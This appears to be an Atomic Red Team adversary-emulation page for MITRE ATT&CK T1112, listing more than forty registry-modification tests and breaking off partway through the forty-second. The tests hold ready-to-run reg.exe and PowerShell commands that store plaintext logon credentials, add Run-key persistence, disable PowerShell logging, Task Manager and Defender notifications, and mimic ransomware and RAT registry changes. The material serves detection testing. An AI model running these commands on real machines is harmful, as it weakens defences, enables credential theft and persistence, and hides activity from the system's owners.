# T1112 - Modify Registry
Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.

Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API.

Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. (Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017)

The Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication.

## Atomic Tests

### Atomic Test #1 - Modify Registry of Current User Profile - cmd
Modify the registry of the currently logged in user using reg.exe via cmd console. Upon execution, the message "The operation completed successfully."
will be displayed. Additionally, open Registry Editor to view the new entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced.

**Supported Platforms:** windows
#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 1

### Atomic Test #2 - Modify Registry of Local Machine - cmd
Modify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup.  This should only be possible when
CMD is ran as Administrative rights. Upon execution, the message "The operation completed successfully."
will be displayed. Additionally, open Registry Editor to view the modified entry in HKLM\Software\Microsoft\Windows\CurrentVersion\Run.

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d calc.exe /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 2

### Atomic Test #3 - Modify registry to store logon credentials
Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping).
Upon execution, the message "The operation completed successfully." will be displayed.
Additionally, open Registry Editor to view the modified entry in HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest.

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 3

### Atomic Test #4 - Add domain to Trusted sites Zone
Attackers may add a domain to the trusted site zone to bypass defenses. Doing this enables attacks such as c2 over office365.
Upon execution, details of the new registry entries will be displayed.
Additionally, open Registry Editor to view the modified entry in HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\.

https://www.blackhat.com/docs/us-17/wednesday/us-17-Dods-Infecting-The-Enterprise-Abusing-Office365-Powershell-For-Covert-C2.pdf

**Supported Platforms:** windows
#### Attack Commands: Run with `powershell`
```powershell
$key= "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\bad-domain.com\"
$name ="bad-subdomain"
new-item $key -Name $name -Force
new-itemproperty $key$name -Name https -Value 2 -Type DWORD;
new-itemproperty $key$name -Name http  -Value 2 -Type DWORD;
new-itemproperty $key$name -Name *     -Value 2 -Type DWORD;
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 4

### Atomic Test #5 - Javascript in registry
Upon execution, a javascript block will be placed in the registry for persistence.
Additionally, open Registry Editor to view the modified entry in HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings.

**Supported Platforms:** windows
#### Attack Commands: Run with `powershell`
```powershell
New-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name T1112 -Value "<script>"
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 5

### Atomic Test #6 - Change Powershell Execution Policy to Bypass
Attackers need to change the powershell execution policy in order to run their malicious powershell scripts.
They can either specify it during the execution of the powershell script or change the registry value for it.

**Supported Platforms:** windows
#### Attack Commands: Run with `powershell`
```powershell
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope LocalMachine
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 6

### Atomic Test #7 - BlackByte Ransomware Registry Changes - CMD
This task recreates the steps taken by BlackByte ransomware before it worms to other machines.  See "Preparing to Worm" section: https://redcanary.com/blog/blackbyte-ransomware/
The steps are as follows:
<ol>
    <li>1. Elevate Local Privilege by disabling UAC Remote Restrictions</li>
    <li>2. Enable OS to share network connections between different privilege levels</li>
    <li>3. Enable long path values for file paths, names, and namespaces to ensure encryption of all file names and paths</li>
</ol>
The registry keys and their respective values will be created upon successful execution.

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`
```command_prompt
cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v LongPathsEnabled /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 7

### Atomic Test #8 - BlackByte Ransomware Registry Changes - Powershell
This task recreates the steps taken by BlackByte ransomware before it worms to other machines via Powershell.  See "Preparing to Worm" section: https://redcanary.com/blog/blackbyte-ransomware/
The steps are as follows:
<ol>
    <li>1. Elevate Local Privilege by disabling UAC Remote Restrictions</li>
    <li>2. Enable OS to share network connections between different privilege levels</li>
    <li>3. Enable long path values for file paths, names, and namespaces to ensure encryption of all file names and paths</li>
</ol>
The registry keys and their respective values will be created upon successful execution.

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`
```powershell
New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -PropertyType DWord -Value 1 -Force
New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -PropertyType DWord -Value 1 -Force
New-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -PropertyType DWord -Value 1 -Force
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 8

### Atomic Test #9 - Disable Windows Registry Tool
Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows registry tool to prevent user modifying registry entry.
See example how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\policies\system /v DisableRegistryTools /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 9

### Atomic Test #10 - Disable Windows CMD application
Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows CMD application.
See example how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`
```powershell
New-ItemProperty -Path "HKCU:\Software\Policies\Microsoft\Windows\System" -Name DisableCMD -Value 1
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 10

### Atomic Test #11 - Disable Windows Task Manager application
Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows task manager application.
See example how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskmgr /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 11

### Atomic Test #12 - Disable Windows Notification Center
Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows notification center.
See how remcos rat abuses this technique- https://tccontre.blogspot.com/2020/01/remcos-rat-evading-windows-defender-av.html

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer /v DisableNotificationCenter /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 12

### Atomic Test #13 - Disable Windows Shutdown Button
Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows shutdown button.
See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom.msil.screenlocker.a/

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /t REG_DWORD /d 0 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 13

### Atomic Test #14 - Disable Windows LogOff Button
Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows logoff button.
See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/be/threat-encyclopedia/search/js_noclose.e/2

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogOff /t REG_DWORD /d 1 /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartMenuLogOff /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 14

### Atomic Test #15 - Disable Windows Change Password Feature
Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows change password feature.
See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom_heartbleed.thdobah

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableChangePassword /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 15

### Atomic Test #16 - Disable Windows Lock Workstation Feature
Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows Lock workstation feature.
See how ransomware abuses this technique- https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 16

### Atomic Test #17 - Activate Windows NoDesktop Group Policy Feature
Modify the registry of the currently logged in user using reg.exe via cmd console to hide all icons on Desktop Group Policy. 
Take note that some Group Policy changes might require a restart to take effect.
See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDesktop /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 17

### Atomic Test #18 - Activate Windows NoRun Group Policy Feature
Modify the registry of the currently logged in user using reg.exe via cmd console to Remove Run menu from Start Menu Group Policy.
Take note that some Group Policy changes might require a restart to take effect.
See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 18

### Atomic Test #19 - Activate Windows NoFind Group Policy Feature
Modify the registry of the currently logged in user using reg.exe via cmd console to Remove Search menu from Start Menu Group Policy.
Take note that some Group Policy changes might require a restart to take effect.
See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 19

### Atomic Test #20 - Activate Windows NoControlPanel Group Policy Feature
Modify the registry of the currently logged in user using reg.exe via cmd console to Disable Control Panel Group Policy. 
Take note that some Group Policy changes might require a restart to take effect.
See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 20

### Atomic Test #21 - Activate Windows NoFileMenu Group Policy Feature
Modify the registry of the currently logged in user using reg.exe via cmd console to Remove File menu from Windows Explorer Group Policy. 
Take note that some Group Policy changes might require a restart to take effect.
See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFileMenu /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 21

### Atomic Test #22 - Activate Windows NoClose Group Policy Feature
Modify the registry of the currently logged in user using reg.exe via cmd console to Disable and remove the Shut Down command Group Policy. 
Take note that some Group Policy changes might require a restart to take effect.
See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 22

### Atomic Test #23 - Activate Windows NoSetTaskbar Group Policy Feature
Modify the registry of the currently logged in user using reg.exe via cmd console to Disable changes to Taskbar and Start Menu Settings Group Policy. 
Take note that some Group Policy changes might require a restart to take effect.
See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetTaskbar /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 23

### Atomic Test #24 - Activate Windows NoTrayContextMenu Group Policy Feature
Modify the registry of the currently logged in user using reg.exe via cmd console to Disable context menu for taskbar Group Policy. 
Take note that some Group Policy changes might require a restart to take effect.
See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoTrayContextMenu /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 24

### Atomic Test #25 - Activate Windows NoPropertiesMyDocuments Group Policy Feature
Modify the registry of the currently logged in user using reg.exe via cmd console to hide Properties from "My Documents icon" Group Policy. 
Take note that some Group Policy changes might require a restart to take effect.
See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoPropertiesMyDocuments /t REG_DWORD /d 1 
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 25

### Atomic Test #26 - Hide Windows Clock Group Policy Feature
Modify the registry of the currently logged in user using reg.exe via cmd console to Hide Clock Group Policy. 
Take note that some Group Policy changes might require a restart to take effect.
See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideClock /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 26

### Atomic Test #27 - Windows HideSCAHealth Group Policy Feature
Modify the registry of the currently logged in user using reg.exe via cmd console to remove security and maintenance icon Group Policy. 
Take note that some Group Policy changes might require a restart to take effect.
See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAHealth /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 27

### Atomic Test #28 - Windows HideSCANetwork Group Policy Feature
Modify the registry of the currently logged in user using reg.exe via cmd console to remove the networking icon Group Policy. 
Take note that some Group Policy changes might require a restart to take effect.
See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCANetwork /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 28

### Atomic Test #29 - Windows HideSCAPower Group Policy Feature
Modify the registry of the currently logged in user using reg.exe via cmd console to remove the battery icon Group Policy. 
Take note that some Group Policy changes might require a restart to take effect.
See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAPower /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 29

### Atomic Test #30 - Windows HideSCAVolume Group Policy Feature
Modify the registry of the currently logged in user using reg.exe via cmd console to remove the volume icon Group Policy. 
Take note that some Group Policy changes might require a restart to take effect..
See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAVolume /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 30

### Atomic Test #31 - Windows Modify Show Compress Color And Info Tip Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to show compress color and show tips feature. 
See how hermeticwiper uses this technique - https://www.splunk.com/en_us/blog/security/detecting-hermeticwiper.html

**Supported Platforms:** windows
#### Attack Commands: Run with `command_prompt`
```command_prompt
reg  add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowInfoTip /t REG_DWORD /d 0 /f
reg  add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor /t REG_DWORD /d 0 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 31

### Atomic Test #32 - Windows Powershell Logging Disabled
Modify the registry of the currently logged in user using reg.exe via cmd console to disable Powershell Module Logging, Script Block Logging, Transcription and Script Execution
see https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableModuleLogging

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`
```command_prompt
reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging /v EnableModuleLogging /t REG_DWORD /d 0 /f
reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging /v EnableScriptBlockLogging /t REG_DWORD /d 0 /f
reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v EnableTranscripting /t REG_DWORD /d 0 /f
reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell /v EnableScripts /t REG_DWORD /d 0 /f
REM do a little cleanup immediately to avoid execution issues with later tests
reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell /v EnableScripts /f >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 32

### Atomic Test #33 - Windows Add Registry Value to Load Service in Safe Mode without Network
Modify the registry to allow a driver, service, to persist in Safe Mode.
see https://redcanary.com/blog/tracking-driver-inventory-to-expose-rootkits/ and https://blog.didierstevens.com/2007/03/26/playing-with-safe-mode/ for further details.
Adding a subkey to Minimal with the name of your service and a default value set to Service, makes that your service will be started when you boot into Safe Mode without networking. The same applies for the Network subkey.

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`
```command_prompt
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AtomicSafeMode" /VE /T REG_SZ /F /D "Service"
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 33

### Atomic Test #34 - Windows Add Registry Value to Load Service in Safe Mode with Network
Modify the registry to allow a driver, service, to persist in Safe Mode with networking.
see https://redcanary.com/blog/tracking-driver-inventory-to-expose-rootkits/ and https://blog.didierstevens.com/2007/03/26/playing-with-safe-mode/ for further details.
Adding a subkey to Netowrk with the name of your service and a default value set to Service, makes that your service will be started when you boot into Safe Mode with networking.

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`
```command_prompt
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AtomicSafeMode" /VE /T REG_SZ /F /D "Service"
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 34

### Atomic Test #35 - Disable Windows Toast Notifications
Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows toast notification.
See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications /v ToastEnabled /t REG_DWORD /d 0 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 35

### Atomic Test #36 - Disable Windows Security Center Notifications
Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows security center notification.
See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ImmersiveShell /v UseActionCenterExperience /t REG_DWORD /d 0 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 36

### Atomic Test #37 - Suppress Win Defender Notifications
Modify the registry of the currently logged in user using reg.exe via cmd console to suppress the windows defender notification.
See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration" /v Notification_Suppress /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 37

### Atomic Test #38 - Allow RDP Remote Assistance Feature
Modify the registry of the currently logged in user using reg.exe via cmd console to allow rdp remote assistance feature. This feature allow specific
user to rdp connect on the targeted machine.
See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 38

### Atomic Test #39 - NetWire RAT Registry Key Creation
NetWire continues to create its home key (HKCU\SOFTWARE\NetWire) as well as adding it into the auto-run group in the victim’s registry.
See how NetWire malware - https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/

**Supported Platforms:** windows
#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v NetWire /t REG_SZ  /d "C:\Users\admin\AppData\Roaming\Install\Host.exe" /f
reg add HKCU\SOFTWARE\NetWire /v HostId /t REG_SZ /d HostId-kai6Ci /f
reg add HKCU\SOFTWARE\NetWire /v "Install Date" /t REG_SZ /d "2021-08-30 07:17:27" /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 39

### Atomic Test #40 - Ursnif Malware Registry Key Creation
Ursnif downloads additional modules from the C&C server and saves these in the registry folder HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\
More information - https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/

**Supported Platforms:** windows
#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /v comsxRes /t REG_BINARY  /d 72656463616e617279 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 40

### Atomic Test #41 - Terminal Server Client Connection History Cleared
The built-in Windows Remote Desktop Connection (RDP) client (mstsc.exe) saves the remote computer name (or IP address) and the username that is used to login after each successful connection to the remote computer

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: Must have the "MR9" Remote Desktop Connection history Key 

##### Check Prereq Commands:
```powershell
if ((Get-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\Default\").MR9) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -path "HKCU:\SOFTWARE\Microsoft\" -name "Terminal Server Client"  -ErrorAction Ignore
New-Item -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\" -name "Default" -ErrorAction Ignore
New-Itemproperty -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\Default" -name "MR9" -value "127.0.0.1"  -PropertyType "String" -ErrorAction Ignore
New-Item -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\" -name "Servers" -ErrorAction Ignore
New-Item -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\Servers" -name "Redcanary" -ErrorAction Ignore

```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 41 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 41

### Atomic Test #42 - Disable Windows Error Reporting Settings
Modify the registry of the currently logged in user using reg.exe via cmd console to disable windows error reporting settings. This Windows feature allow the use to report bug, errors, failure or problems 
